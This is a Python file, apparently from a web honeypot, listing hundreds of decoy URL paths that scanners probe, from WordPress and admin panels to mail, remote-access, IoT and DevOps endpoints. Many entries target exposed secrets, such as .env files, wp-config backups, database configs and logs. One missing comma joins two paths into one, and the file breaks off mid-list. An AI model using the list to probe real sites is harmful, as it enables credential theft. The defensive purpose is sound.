# honeypot_routes.py
# Just defines routes without importing or modifying blueprint

def get_honeypot_routes():
    """Return a dictionary of all honeypot routes by category"""
    
    honeypot_routes = {
        # Wordpress
        "wordpress": [
            '/wp-login.php',
            '/wp-admin',
            '/wp-admin/admin-ajax.php',
            '/wordpress/wp-login.php',
            '/wordpress/wp-admin',
            '/blog/wp-login.php',
            '/blog/wp-admin',
            '/wp-admin/index.php',
            '/wp-admin/profile.php',
            '/wp-admin/options-general.php',
            '/wp-admin/post.php',
            '/wp-admin/edit.php',
            '/wp-admin/post-new.php',
            '/wp-admin/plugins.php',
            '/wp-admin/users.php',
            '/wp-admin/themes.php',
            '/wp-admin/options-writing.php',
            '/wp-admin/options-reading.php',
            '/wp-admin/options-discussion.php',
            '/wp-admin/options-media.php',
            '/wp-admin/options-permalink.php',
            '/wp-admin/upload.php',
            '/wp-admin/media-new.php',
            '/wp-admin/edit-comments.php',
            '/wp-admin/network-admin.php',
            '/wp-admin/network',
            '/wp-admin/update-core.php',
            '/wp/wp-admin',
            '/wp/wp-login.php',
            '/wordpress/wp-admin/index.php',
            '/blog/wp-admin/index.php',
            '/news/wp-admin',
            '/news/wp-login.php',
            '/cms/wp-admin',
            '/cms/wp-login.php',
            '/site/wp-admin',
            '/site/wp-login.php',
            '/main/wp-admin',
            '/main/wp-login.php',
            '/web/wp-admin',
            '/web/wp-login.php',
            '/staging/wp-admin',
            '/staging/wp-login.php',
            '/test/wp-admin',
            '/test/wp-login.php',
            '/dev/wp-admin',
            '/dev/wp-login.php',
            '/backup/wp-admin',
            '/backup/wp-login.php',
            '/old/wp-admin',
            '/old/wp-login.php',
            '/new/wp-admin',
            '/new/wp-login.php',
            '/demo/wp-admin',
            '/demo/wp-login.php',
            '/xmlrpc.php',
            '/wordpress/xmlrpc.php',
            '/wp/xmlrpc.php',
            '/blog/xmlrpc.php',
            '/news/xmlrpc.php',
            '/cms/xmlrpc.php',
            '/wp-config.php',
            '/wp-config.php.bak',
            '/wp-config.php.old',
            '/wp-config.php.save',
            '/wp-config.php.swp',
            '/wp-config.php.txt',
            '/wp-config.php~',
            '/wp-config-sample.php',
            '/wordpress/wp-config.php',
            '/blog/wp-config.php',
            '/wp-json',
            '/wp-json/wp/v2/users',
            '/wp-json/wp/v2/posts',
            '/wp-json/wp/v2/pages',
            '/wp-json/wp/v2/media',
            '/wp-json/wp/v2/comments',
            '/wp-json/wp/v2/types',
            '/wp-json/wp/v2/statuses',
            '/wp-json/wp/v2/taxonomies',
            '/wp-json/wp/v2/categories',
            '/wp-json/wp/v2/tags',
            '/wp-json/wp/v2/settings',
            '/wp-json/wp/v2/themes',
            '/wp-json/wp/v2/plugins',
            '/wp-json/wp/v2/block-types',
            '/wp-json/wp/v2/blocks',
            '/wp-json/wp/v2/search',
            '/wp-content/plugins/wp-file-manager/readme.txt',
            '/wp-content/plugins/wp-file-manager/fm_backups',
            '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',
            '/wp-content/plugins/contact-form-7/readme.txt',
            '/wp-content/plugins/woocommerce/readme.txt',
            '/wp-content/plugins/elementor/readme.txt',
            '/wp-content/plugins/akismet/readme.txt',
            '/wp-content/plugins/all-in-one-seo-pack/readme.txt',
            '/wp-content/plugins/yoast-seo/readme.txt',
            '/wp-content/plugins/wordfence/readme.txt',
            '/wp-content/plugins/wpforms-lite/readme.txt',
            '/wp-content/plugins/jetpack/readme.txt',
            '/wp-content/plugins/duplicator/readme.txt',
            '/wp-content/plugins/updraftplus/readme.txt',
            '/wp-content/plugins/wp-super-cache/readme.txt',
            '/wp-content/plugins/ninja-forms/readme.txt',
            '/wp-content/plugins/wp-mail-smtp/readme.txt',
            '/wp-content/plugins/redirection/readme.txt',
            '/wp-content/plugins/slider-revolution/readme.txt',
            '/wp-content/plugins/gravityforms/readme.txt',
            '/wp-content/plugins/elementor-pro/readme.txt',
            '/wp-content/plugins/advanced-custom-fields/readme.txt',
            '/wp-content/plugins/sucuri-scanner/readme.txt',
            '/wp-content/plugins/wp-optimize/readme.txt',
            '/wp-content/plugins/wp-security-audit-log/readme.txt',
            '/wp-content/plugins/wp-hide-security-enhancer/readme.txt',
            '/wp-content/plugins/all-in-one-wp-migration/readme.txt',
            '/wp-content/plugins/classic-editor/readme.txt',
            '/wp-content/plugins/google-analytics-for-wordpress/readme.txt',
            '/wp-content/plugins/tinymce-advanced/readme.txt',
            '/wp-content/plugins/admin',
            '/wp-content/plugins/login',
            '/wp-content/plugins/manager',
            '/wp-content/plugins/config',
            '/wp-content/plugins/settings',
            '/wp-content/plugins/setup',
            '/wp-content/plugins/install',
            '/wp-content/themes/twentytwentyfour/style.css',
            '/wp-content/themes/twentytwentythree/style.css',
            '/wp-content/themes/twentytwentytwo/style.css',
            '/wp-content/themes/twentytwentyone/style.css',
            '/wp-content/themes/twentytwenty/style.css',
            '/wp-content/themes/twentynineteen/style.css',
            '/wp-content/themes/twentyeighteen/style.css',
            '/wp-content/themes/twentyseventeen/style.css',
            '/wp-content/themes/twentysixteen/style.css',
            '/wp-content/themes/twentyfifteen/style.css',
            '/wp-content/themes/astra/style.css',
            '/wp-content/themes/divi/style.css',
            '/wp-content/themes/avada/style.css',
            '/wp-content/themes/hello-elementor/style.css',
            '/wp-content/themes/oceanwp/style.css',
            '/wp-content/themes/generatepress/style.css',
            '/wp-content/themes/neve/style.css',
            '/wp-content/themes/storefront/style.css',
            '/wp-content/themes/flatsome/style.css',
            '/wp-content/themes/enfold/style.css',
            '/wp-content/backup-db',
            '/wp-content/backups',
            '/wp-content/backup',
            '/wp-content/bak',
            '/wp-content/old',
            '/wp-content/temp',
            '/wp-content/tmp',
            '/wp-content/cache',
            '/wp-content/uploads/backups',
            '/wp-content/uploads/backup-db',
            '/wp-content/debug.log',
            '/wp-content/debug.txt',
            '/wp-content/error.log',
            '/wp-content/error_log',
            '/wp-content/php_error.log',
            '/wp-content/uploads/debug.log',
            '/wp-content/uploads/error.log',
            '/wp-content/uploads/error_log',
            '/wp-admin/install.php',
            '/wp-admin/setup-config.php',
            '/wp-admin/upgrade.php',
            '/wp-admin/upgrade-functions.php',
            '/wp-admin/includes/upgrade.php',
            '/wp-content/uploads',
            '/wp-content/uploads/2025',
            '/wp-content/uploads/2024',
            '/wp-content/uploads/2023',
            '/wp-content/uploads/2022',
            '/wp-content/uploads/2021',
            '/wp-content/uploads/2020',
            '/wp-content/uploads/2019',
            '/wp-content/uploads/2018',
            '/wp-load.php',
            '/wp-includes/version.php',
            '/wp-includes/functions.php',
            '/wp-includes/class-wp.php',
            '/wp-includes/class-wp-error.php',
            '/wp-includes/plugin.php',
            '/wp-includes/l10n.php',
            '/wp-includes/user.php',
            '/wp-includes/post.php',
            '/wp-includes/meta.php',
            '/wp-includes/capabilities.php',
            '/wp-includes/theme.php',
            '/login',
            '/login.php',
            '/wp/login',
            '/wordpress/login',
            '/blog/login',
            '/wp-login',
            '/wp-login/',
            '/login/',
            '/admin/login',
            '/wp-admin/login',
            '/admin/',
            '/wp-signup.php',
            '/wp-register.php',
            '/wp-activate.php',
            '/wordpress/wp-signup.php',
            '/wordpress/wp-register.php',
            '/blog/wp-signup.php',
            '/blog/wp-register.php',
            '/wp-admin/network',
            '/wp-admin/network/sites.php',
            '/wp-admin/network/users.php',
            '/wp-admin/network/themes.php',
            '/wp-admin/network/plugins.php',
            '/wp-admin/network/settings.php',
            '/wp-admin/network/update-core.php',
            '/wp-admin/network/admin.php',
            '/wp-admin/network/edit.php',
            '/wp-admin/network/site-info.php',
            '/wp-admin/network/site-users.php',
            '/wp-admin/network/site-themes.php',
            '/wp-admin/network/site-settings.php',
            '/wp-admin/network/site-new.php',
            '/wp-admin/network/user-new.php',
            '/wp-content/uploads/media',
            '/wp-content/uploads/images',
            '/wp-content/uploads/files',
            '/wp-content/uploads/documents',
            '/wp-content/uploads/assets',
            '/wp-content/uploads/pdf',
            '/wp-content/uploads/private',
            '/wp-content/uploads/restricted',
            '/wp-content/uploads/users',
            '/wp-content/uploads/avatars',
            '/wp-cron.php',
            '/wp-trackback.php',
            '/wp-links-opml.php',
            '/wp-mail.php',
            '/wp-settings.php',
            '/wp-signup.php',
            '/wp-blog-header.php',
            '/wp-comments-post.php',
            '/wp-activate.php',
            '/wp-links.php',
            '/wp-feed.php',
            '/wp-atom.php',
            '/wp-rss.php',
            '/wp-pass.php',
            '/wp-rdf.php',
            '/wp-commentsrss2.php',
            '/robots.txt',
            '/readme.html',
            '/license.txt',
            '/licences.txt',
            '/changelog.txt',
            '/sitemap.xml',
            '/sitemap_index.xml',
            '/.htaccess',
            '/wp-includes/certificates',
            '/wp-includes/pomo',
            '/wp-includes/rest-api',
            '/wp-includes/sodium_compat',
            '/wp-includes/sitemaps',
            '/wp-content/mu-plugins',
            '/wp-content/languages',
            '/wp-config-docker.php',
            '/wp-config-local.php',
            '/wp-config-dev.php',
            '/wp-config-staging.php',
        ],
        # admin
        "admin_panels": [
            '/admin',
            '/admin/',
            '/administrator',
            '/admin/login',
            '/admin/login.php',
            '/administrator/index.php',
            '/admin.php',
            '/admin/admin.php',
            '/adminpanel',
            '/administrador',
            '/admin/dashboard',
            '/admin/home',
            '/admin/control',
            '/admin/cp',
            '/admin/portal',
            '/admin-panel',
            '/admin-console',
            '/admin-area',
            '/admin-login',
            '/admin-dashboard',
            '/adm',
            '/adm/',
            '/adm/index.php',
            '/adm/admin.php',
            '/adminarea',
            '/admincontrol',
            '/admloginuser',
            '/admcp',
            '/admin_area',
            '/admin_login',
            '/siteadmin',
            '/siteadmin/login',
            '/siteadmin/index',
            '/siteadmin/login.html',
            '/site-admin',
            '/backup/admin',
            '/admin123',
            '/admin_c',
            '/administrator/admin',
            '/administrator.php',
            '/administrator.html',
            '/administrator/account',
            '/administrator.asp',
            '/admin1',
            '/admin2',
            '/admin3',
            '/admin4',
            '/admin5',
            '/moderator',
            '/moderator/',
            '/moderator/login',
            '/moderator/admin',
            '/webadmin',
            '/webadmin/index',
            '/webadmin/admin',
            '/webadmin/login',
            '/user/admin',
            '/adminpanel.php',
            '/adminpanel.asp',
            '/adminpanel.html',
            '/adminlogin',
            '/adminlogin.php',
            '/adminlogin.asp',
            '/panel-admin',
            '/panel-administrator',
            '/wp-admin',
            '/wp-login',
            '/wp-login.php',
            '/wplogin',
            '/administrator/login.php',
            '/backend',
            '/backend/login',
            '/backend/admin',
            '/secure/admin',
            '/secure/login',
            '/manage',
            '/management',
            '/management/admin',
            '/management/login',
            '/manager',
            '/manager/login',
            '/manager/admin',
            '/member/admin',
            '/panel',
            '/control',
            '/control/login',
            '/console',
            '/console/login',
            '/cp',
            '/cp/login',
            '/administrators',
            '/administrators/login',
            '/admins',
            '/admins/login',
            '/adm/admloginuser.php',
            '/adm/index.php',
            '/adm/admin.php',
            '/joomla/administrator',
            '/cms/admin',
            '/cms/administrator',
            '/system/admin',
            '/system/login',
            '/portal/admin',
            '/portal/login',
            '/admin1.php',
            '/admin2.php',
            '/yonetim',
            '/yonetim.php',
            '/yonetici',
            '/admin1.html',
            '/admin1.asp',
            '/admin2.asp',
            '/admin2.html',
            '/yonetim.html',
            '/yonetici.html',
            '/yonetici.php',
            '/admin1/login.php',
            '/admin2/login.php',
            '/cpanel',
            '/cpanel/login',
            '/phpmyadmin',
            '/phpmyadmin/login',
            '/phppgadmin',
            '/phppgadmin/login',
            '/myadmin',
            '/sql/login',
            '/mysql/login',
            '/pma',
            '/dbadmin',
            '/db/phpmyadmin',
            '/db/phpMyAdmin',
            '/phpmy',
            '/phpMyAdmin',
            '/phpMyAdmin/login',
            '/sqlmanager',
            '/mysqlmanager',
            '/php-myadmin',
            '/mysqladmin',
            '/mysql-admin',
            '/database',
            '/database/login',
            '/db',
            '/db/admin',
            '/db/login',
            '/admin/db',
            '/admin/pma',
            '/admin/mysql',
            '/admin/phpmyadmin',
            '/secret',
            '/secret/admin',
            '/secret/login',
            '/adm/index',
            '/private',
            '/private/admin',
            '/private/login',
            '/server/admin',
            '/server/login',
            '/sys/admin',
            '/sys/login',
            '/admin_panel',
            '/admin_panel.php',
            '/admin_panel.html',
            '/admin_panel.asp',
            '/admin.html',
            '/admin.asp',
            '/adminweb',
            '/adminweb/',
            '/api/admin',
            '/api/login',
            '/users/admin',
            '/users/login',
            '/super',
            '/super/login',
            '/super/admin',
            '/auth',
            '/auth/login',
            '/authenticate',
            '/administrator/account.asp',
            '/administrator/account.html',
            '/administrator/login.asp',
            '/administrator/login.html',
            '/administrator/index.asp',
            '/administrator/index.html',
            '/secret/.env',
            '/config/.env',
            '/application/.env',
            '/.env',
            '/.env.backup',
            '/.env.old',
            '/.env.dev',
            '/.env.development',
            '/.env.local',
            '/.env.prod',
            '/.env.production',
            '/.env.test',
            '/.env.example',
            '/.env.bak',
            '/config.php',
            '/config.ini',
            '/config.json',
            '/config.yml',
            '/config.yaml',
            '/config.xml',
            '/config/config.php',
            '/config/database.php',
            '/app/config/database.php',
            '/application/config/database.php',
            '/application/config.php',
            '/includes/config.php',
            '/inc/config.php',
            '/db/config.php',
            '/db/config.ini',
            '/database.php',
            '/database.yml',
            '/database.json',
            '/configuration.php',
            '/configuration.ini',
            '/settings.php',
            '/settings.ini',
            '/settings.json',
            '/app/config.php',
            '/app/settings.php',
            '/app/database.php',
            '/app/db.php',
            '/conn.php',
            '/connection.php',
            '/db-config.php',
            '/db-connection.php',
            '/db_config.php',
            '/db_connection.php',
            '/db.php',
            '/db.ini',
            '/includes/db.php',
            '/includes/database.php',
            '/inc/db.php',
            '/inc/database.php',
            '/api/config',
            '/config.js',
            '/backup',
            '/backup/',
            '/backup/config',
            '/backup/db',
            '/backup/database',
            '/backup/files',
            '/backup/website',
            '/backups',
            '/backups/',
            '/bak',
            '/old',
            '/old/config',
            '/old/database',
            '/old/db',
            '/log',
            '/logs',
            '/logs/',
            '/log/',
            '/error_log',
            '/error.log',
            '/debug.log',
            '/access.log',
            '/access_log',
            '/php_error.log',
            '/server.log',
            '/server_log',
            '/app/logs',
            '/application/logs',
            '/var/log',
            '/usr/logs',
            '/debug',
            '/debug/bar',
            '/debug/console',
            '/phpinfo',
            '/phpinfo.php',
            '/info.php',
            '/php',
            '/php/',
            '/status',
            '/server-status',
            '/server-info'
            '/admin/index.jsp',
            '/admin/control.jsp',
            '/administrator/index.jsp',
            '/admin/auth',
            '/admin/auth/login',
            '/admin/setup',
            '/admin/install',
            '/admin/configure',
            '/admin/maintenance',
            '/admin/backup',
            '/admin/reset',
            '/admin/reports',
            '/admin/stats',
            '/admin/analytics',
            '/admin/users',
            '/admin/roles',
            '/admin/permissions',
            '/admin/settings',
            '/admin/config',
            '/admin/configuration',
            '/admin-settings',
            '/admin-config',
            '/admin/security',
            '/admin/profile',
            '/admin/tools',
            '/admin/modules',
            '/admin/plugins',
            '/admin/themes',
            '/admin/templates',
            '/admin/logs',
            '/admin/log',
            '/admin/activity',
            '/admin/monitor',
            '/admin/api',
            '/admin/api/v1',
            '/admin/api/v2',
            '/admin/filemanager',
            '/admin/files',
            '/admin/upload',
            '/admin/download',
            '/admin/export',
            '/admin/import',
            '/admin/database',
            '/admin/db',
            '/admin/sql',
            '/admin/mysql',
            '/admin/postgres',
            '/admin/mongodb',
            '/admin/redis',
            '/admin/cache',
            '/admin/flush',
            '/admin/purge',
            '/admin/clear',
            '/admin/update',
            '/admin/upgrade',
            '/admin/install.php',
            '/admin/setup.php',
            '/admin/config.php',
            '/admin/login.jsp',
            '/admin/login.aspx',
            '/admin/login.asp',
            '/admin/login.js',
            '/admin/login.cgi',
            '/admin/auth.php',
            '/admin/auth.jsp',
            '/admin/auth.aspx',
            '/admin/dashboard.php',
            '/admin/dashboard.asp',
            '/admin/dashboard.aspx',
            '/admin/dashboard.jsp',
            '/admin/dashboard.html',
            '/admin/cp.php',
            '/admin/controlpanel',
            '/admin/adminpanel',
            '/adminportal',
            '/adminsite',
            '/adminsection',
            '/adminhome',
            '/adminindex',
            '/admin.aspx',
            '/admin/index.aspx',
            '/admin_console',
            '/admin-cp',
            '/admin/phpinfo.php',
            '/admin/info.php',
            '/admin/apc.php',
            '/admin/opcache.php',
            '/admin/server-info',
            '/admin/server-status',
            '/admin/status.php',
            '/admin/health',
            '/admin/metrics',
            '/admin/statistics',
            '/admin/accounts',
            '/admin/members',
            '/admin/customers',
            '/admin/subscribers',
            '/admin/orders',
            '/admin/products',
            '/admin/catalog',
            '/admin/categories',
            '/admin/tags',
            '/admin/comments',
            '/admin/reviews',
            '/admin/ratings',
            '/admin/feedback',
            '/admin/tickets',
            '/admin/support',
            '/admin/helpdesk',
            '/admin/faq',
            '/admin/knowledge',
            '/admin/articles',
            '/admin/posts',
            '/admin/pages',
            '/admin/media',
            '/admin/images',
            '/admin/videos',
            '/admin/documents',
            '/admin/attachments',
            '/admin/newsletters',
            '/admin/campaigns',
            '/admin/marketing',
            '/admin/seo',
            '/admin/analytics',
            '/admin/reports',
            '/admin/statistics/users',
            '/admin/statistics/traffic',
            '/admin/statistics/sales',
            '/admin/logs/access',
            '/admin/logs/error',
            '/admin/logs/security',
            '/admin/logs/activity',
            '/admin/export/users',
            '/admin/export/orders',
            '/admin/export/products',
            '/admin/import/users',
            '/admin/import/products',
            '/admin/backup/db',
            '/admin/backup/files',
            '/admin/restore',
            '/admin/cron',
            '/admin/scheduled',
            '/admin/tasks',
            '/admin/jobs',
            '/admin/queue',
            '/admin/workers',
            '/admin/processes',
            '/admin/services',
            '/admin/daemons',
            '/admin/system',
            '/admin/platform',
            '/admin/environment',
            '/admin/configuration/general',
            '/admin/configuration/security',
            '/admin/configuration/performance',
            '/admin/configuration/email',
            '/admin/configuration/payment',
            '/admin/configuration/shipping',
            '/admin/configuration/tax',
            '/admin/integration',
            '/admin/api/keys',
            '/admin/api/tokens',
            '/admin/api/webhooks',
            '/admin/api/docs',
            '/admin/auth/2fa',
            '/admin/auth/saml',
            '/admin/auth/ldap',
            '/admin/auth/sso',
            '/admin/users/roles',
            '/admin/users/permissions',
            '/admin/users/groups',
            '/admin/users/invites',
            '/admin/users/sessions',
            '/admin/users/activity',
            '/admin/acl',
            '/admin/rbac',
            '/admin/permissions/roles',
            '/admin/permissions/groups',
            '/admin/logs/audit',
            '/admin/logs/login',
            '/admin/logs/changes',
            '/admin/security/firewall',
            '/admin/security/waf',
            '/admin/security/blocklist',
            '/admin/security/allowlist',
            '/admin/security/scanner',
            '/admin/security/malware',
            '/admin/security/updates',
            '/admin/security/patches',
            '/admin/security/vulnerabilities',
            '/admin/network',
            '/admin/network/settings',
            '/admin/network/dns',
            '/admin/network/firewall',
            '/admin/storage',
            '/admin/storage/files',
            '/admin/storage/backups',
            '/admin/storage/uploads',
            '/admin/storage/media',
            '/admin/storage/s3',
            '/admin/storage/cloud',
            '/admin/storage/cdn',
            '/admin/plugins/installed',
            '/admin/plugins/store',
            '/admin/plugins/upload',
            '/admin/plugins/settings',
            '/admin/themes/installed',
            '/admin/themes/store',
            '/admin/themes/upload',
            '/admin/themes/customize',
            '/admin/themes/editor',
            '/admin/modules/installed',
            '/admin/modules/store',
            '/admin/modules/upload',
            '/admin/modules/settings',
            '/admin/widgets',
            '/admin/blocks',
            '/admin/components',
            '/admin/elements',
            '/admin/email/templates',
            '/admin/email/campaigns',
            '/admin/email/autoresponders',
            '/admin/email/newsletter',
            '/admin/email/subscribers',
            '/admin/sms',
            '/admin/sms/campaigns',
            '/admin/sms/templates',
            '/admin/notifications',
            '/admin/alerts',
            '/admin/events',
            '/admin/calendar',
            '/admin/schedule',
            '/admin/appointments',
            '/admin/bookings',
            '/admin/reservations',
            '/user-admin',
            '/admin-user',
            '/admin-panel-login',
            '/laravel-admin',
            '/symfony-admin',
            '/django-admin',
            '/rails-admin',
            '/spring-admin',
            '/node-admin',
            '/express-admin',
            '/react-admin',
            '/vue-admin',
            '/angular-admin',
            '/wordpress-admin',
            '/joomla-admin',
            '/drupal-admin',
            '/magento-admin',
            '/shopify-admin',
            '/prestashop-admin'
        ],
        "e_commerce": [
            # Shopify
            '/shopify-login', '/shopify/admin', '/admin/shopify', '/shop/admin-login',
            '/myshopify/login', '/shopify/dashboard', '/store-admin', '/shopify-admin',
            '/vendors/login', '/merchant/login', '/merchant-center', '/seller-central',
            
            # WooCommerce
            '/woocommerce/admin', '/wc-admin', '/wc-login', '/wc/v3/admin',
            '/woo/login', '/woocommerce-login', '/woo-admin', '/woocommerce/dashboard',
            '/shop/wc-admin', '/store/wc-admin', '/market/admin', '/marketplace/admin',
            
            # PrestaShop
            '/prestashop/admin', '/ps-admin', '/prestashop-admin', '/presta/backoffice',
            '/adminshop', '/ps/admin123', '/prestashop/adminpanel', '/ps/admin-login',
            '/presta/admin', '/ps-backoffice', '/prestashop/back', '/ps/back-office',
            
            # OpenCart
            '/opencart/admin', '/oc-admin', '/opencart-admin', '/oc/login',
            '/opencart/login', '/admin/opencart', '/shop/oc-admin', '/store/oc-admin',
            '/opencart/backoffice', '/oc/dashboard', '/oc-panel', '/opencart/panel',
            
            # Big Commerce
            '/bigcommerce/login', '/bc-admin', '/bigcommerce-admin', '/bc/login',
            '/bigcommerce/dashboard', '/bc/dashboard', '/bc-panel', '/bigcommerce/panel'
        ],
        
        "additional_cms": [
            # Typo3
            '/typo3', '/typo3/login', '/t3-admin', '/typo3/backend', '/typo3/index.php',
            '/typo3conf', '/typo3temp', '/typo3/install', '/t3/backend', '/typo3cms/login',
            
            # Craft CMS
            '/craft/login', '/craft-admin', '/craftcms/login', '/admin/craft',
            '/craft/dashboard', '/craft/cp', '/craftcms/admin', '/craft/control-panel',
            
            # ExpressionEngine
            '/expressionengine/login', '/ee-admin', '/ee/login', '/ee/cp',
            '/ee/dashboard', '/ee-cp', '/ee-backend', '/system/ee/login',
            
            # Concrete5/ConcreteCMS
            '/concrete/login', '/concrete5/login', '/concrete/dashboard', '/c5/login',
            '/concretecms/login', '/c5-admin', '/concrete-admin', '/c5/dashboard',
            
            # SilverStripe
            '/silverstripe/admin', '/ss-admin', '/cms/login', '/ss/login',
            '/silverstripe/dashboard', '/ss/admin', '/admin/ss', '/cms/admin',
            
            # Ghost
            '/ghost', '/ghost/login', '/ghost/admin', '/ghost/dashboard',
            '/ghost-admin', '/ghost/signin', '/ghostcms/login', '/ghost/backend',
            
            # Umbraco
            '/umbraco', '/umbraco/login', '/umbraco/backoffice', '/umbraco/dashboard',
            '/umbraco-login', '/umbraco-admin', '/umbraco/backend', '/umbraco/admin',
            
            # DotNetNuke/DNN
            '/dotnetnuke/login', '/dnn/login', '/dnn-admin', '/dnn/admin',
            '/dotnetnuke/admin', '/dnn/dashboard', '/dnn/host', '/dnn/portal',
            
            # Kentico
            '/kentico/login', '/kentico-admin', '/kentico/admin', '/kentico/dashboard',
            '/kentico-cms', '/kentico/cms', '/admin/kentico', '/k-admin'
        ],
        
        "forums_and_boards": [
            # phpBB
            '/phpbb', '/phpbb/login', '/phpbb/admin', '/forum/admin',
            '/phpbb/admincp', '/forum/admincp', '/phpbb/modcp', '/forum/modcp',
            '/phpbb/install', '/forum/ucp', '/forum/acp', '/forum/install.php',
            
            # vBulletin
            '/vbulletin/login', '/vb/login', '/vb/admincp', '/vbulletin/admincp',
            '/vb/modcp', '/vbulletin/modcp', '/vb/install', '/vbulletin/install',
            '/forum/vb/login', '/forum/admincp', '/vb/admin', '/forum/admin',
            
            # XenForo
            '/xenforo/admin', '/xf/admin', '/xf/login', '/xenforo/login',
            '/forum/xf-admin', '/xf-admin', '/xenforo-admin', '/xf/admincp',
            '/community/admin', '/community/login', '/xf/install', '/xenforo/install',
            
            # SMF
            '/smf/admin', '/smf/login', '/forum/smf-admin', '/simplemachines/admin',
            '/forum/smf/login', '/smf-admin', '/smf/install', '/forum/admin.php',
            '/community/smf', '/smf/Admin', '/forum/Admin', '/smf/AdminIndex.php',
            
            # Discourse
            '/discourse/login', '/discourse/admin', '/community/login', '/community/admin',
            '/discourse-admin', '/discourse-login', '/discuss/admin', '/forum/discourse'
        ],
        
        "file_sharing": [
            # General file sharing
            '/files/admin', '/download/admin', '/uploads/admin', '/share/admin',
            '/files/login', '/download/login', '/uploads/login', '/share/login',
            '/files/index.php', '/download/index.php', '/uploads/index.php', '/share/index.php',
            
            # OwnCloud/NextCloud
            '/owncloud/login', '/nextcloud/login', '/owncloud/admin', '/nextcloud/admin',
            '/cloud/login', '/owncloud/index.php', '/nextcloud/index.php', '/cloud/admin',
            '/owncloud/remote.php', '/nextcloud/remote.php', '/cloud/index.php', '/cloud/remote.php',
            
            # Seafile
            '/seafile/login', '/seafile/admin', '/seafile/index.php', '/sea/login',
            '/seafile/dashboard', '/sea-admin', '/seafile-admin', '/sea/admin',
            
            # FileRun
            '/filerun/login', '/filerun/admin', '/filerun/index.php', '/fr/login',
            '/filerun/dashboard', '/fr-admin', '/filerun-admin', '/fr/admin'
        ],
        
        "database_endpoints": [
            # MongoDB
            '/mongo', '/mongodb', '/mongo-express', '/mongodb-admin',
            '/mongo/login', '/mongodb/login', '/mongo-express/login', '/mongodb-admin/login',
            
            # PostgreSQL
            '/postgres', '/postgresql', '/pgadmin', '/phppgadmin',
            '/postgres/login', '/postgresql/login', '/pgadmin/login', '/phppgadmin/login',
            
            # Redis
            '/redis', '/redis-commander', '/redis-admin', '/redis-ui',
            '/redis/login', '/redis-commander/login', '/redis-admin/login', '/redis-ui/login',
            
            # Elasticsearch
            '/elastic', '/elasticsearch', '/kibana', '/elastic-hq',
            '/elastic/login', '/elasticsearch/login', '/kibana/login', '/elastic-hq/login',
            
            # Cassandra
            '/cassandra', '/cassandra-admin', '/opscenter', '/cassandra-web',
            '/cassandra/login', '/cassandra-admin/login', '/opscenter/login', '/cassandra-web/login',
            
            # CouchDB
            '/couchdb', '/couch', '/futon', '/fauxton',
            '/couchdb/login', '/couch/login', '/futon/login', '/fauxton/login'
        ],
        
        "mail_servers": [
            # Roundcube
            '/roundcube', '/roundcube/login', '/webmail/roundcube', '/mail/roundcube',
            '/roundcubemail', '/roundcubemail/login', '/rc/login', '/roundcube/index.php',
            
            # Squirrelmail
            '/squirrelmail', '/squirrelmail/login', '/webmail/squirrelmail', '/mail/squirrelmail',
            '/squirrelmail/src/login.php', '/sm/login', '/squirrel/login', '/squirrelmail/index.php',
            
            # Zimbra
            '/zimbra', '/zimbra/login', '/mail/zimbra', '/webmail/zimbra',
            '/zimbra/admin', '/zimbra-admin', '/zimbraadmin', '/zimbra/h/login',
            
            # Postfix Admin
            '/postfixadmin', '/postfix-admin', '/postfix/admin', '/mail/admin',
            '/postfixadmin/login', '/postfix-admin/login', '/postfix/login', '/mail/postfix',
            
            # Dovecot
            '/dovecot', '/dovecot/login', '/mail/dovecot', '/dovecot-admin',
            '/dovecot/admin', '/mail/dovecot-admin', '/dovecot/webmail', '/mail/dovecot/login',
            
            # Microsoft Exchange
            '/owa', '/exchange', '/mail/exchange', '/outlook',
            '/owa/login', '/exchange/login', '/outlook/login', '/exchange/admin',
            '/ecp', '/ews', '/oab', '/autodiscover',
            '/microsoft-server-activesync', '/rpc', '/mapi', '/powershell'
        ],
        
        "remote_access": [
            # SSH Web Interfaces
            '/ssh', '/webssh', '/web-ssh', '/ssh-web',
            '/ssh/login', '/webssh/login', '/web-ssh/login', '/ssh-web/login',
            
            # VNC
            '/vnc', '/webvnc', '/web-vnc', '/vnc-web',
            '/vnc/login', '/webvnc/login', '/web-vnc/login', '/vnc-web/login',
            
            # RDP
            '/rdp', '/webrdp', '/web-rdp', '/rdp-web',
            '/rdp/login', '/webrdp/login', '/web-rdp/login', '/rdp-web/login',
            
            # Telnet
            '/telnet', '/webtelnet', '/web-telnet', '/telnet-web',
            '/telnet/login', '/webtelnet/login', '/web-telnet/login', '/telnet-web/login',
            
            # TeamViewer
            '/teamviewer', '/team-viewer', '/tv-web', '/tv/login',
            '/teamviewer/login', '/team-viewer/login', '/tv-web/login', '/tv/web',
            
            # AnyDesk
            '/anydesk', '/any-desk', '/ad-web', '/ad/login',
            '/anydesk/login', '/any-desk/login', '/ad-web/login', '/ad/web'
        ],
        
        "iot_devices": [
            # IP Cameras
            '/camera', '/ipcam', '/webcam', '/cam',
            '/camera/login', '/ipcam/login', '/webcam/login', '/cam/login',
            '/camera/admin', '/ipcam/admin', '/webcam/admin', '/cam/admin',
            
            # Routers
            '/router', '/gateway', '/gw', '/modem',
            '/router/login', '/gateway/login', '/gw/login', '/modem/login',
            '/router/admin', '/gateway/admin', '/gw/admin', '/modem/admin',
            
            # Smart Home
            '/smarthome', '/smart-home', '/sh', '/home',
            '/smarthome/login', '/smart-home/login', '/sh/login', '/home/login',
            '/smarthome/admin', '/smart-home/admin', '/sh/admin', '/home/admin',
            
            # Industrial Control Systems
            '/ics', '/scada', '/plc', '/hmi',
            '/ics/login', '/scada/login', '/plc/login', '/hmi/login',
            '/ics/admin', '/scada/admin', '/plc/admin', '/hmi/admin'
        ],
        
        "devops_tools": [
            # Jenkins
            '/jenkins', '/jenkins/login', '/ci', '/ci/login',
            '/jenkins/dashboard', '/ci/dashboard', '/jenkins/admin', '/ci/admin',
            
            # GitLab
            '/gitlab', '/gitlab/login', '/git', '/git/login',
            '/gitlab/admin', '/git/admin', '/gitlab/dashboard', '/git/dashboard',
            
            # Travis CI
            '/travis', '/travis/login', '/travisci', '/travisci/login',
            '/travis/admin', '/travisci/admin', '/travis/dashboard', '/travisci/dashboard',
            
            # CircleCI
            '/circleci', '/circleci/login', '/circle', '/circle/login',
            '/circleci/admin', '/circle/admin', '/circleci/dashboard', '/circle/dashboard',
            
            # Docker
            '/docker', '/docker/login', '/portainer', '/portainer/login',
            '/docker/admin', '/portainer/admin', '/docker/dashboard', '/portainer/dashboard',
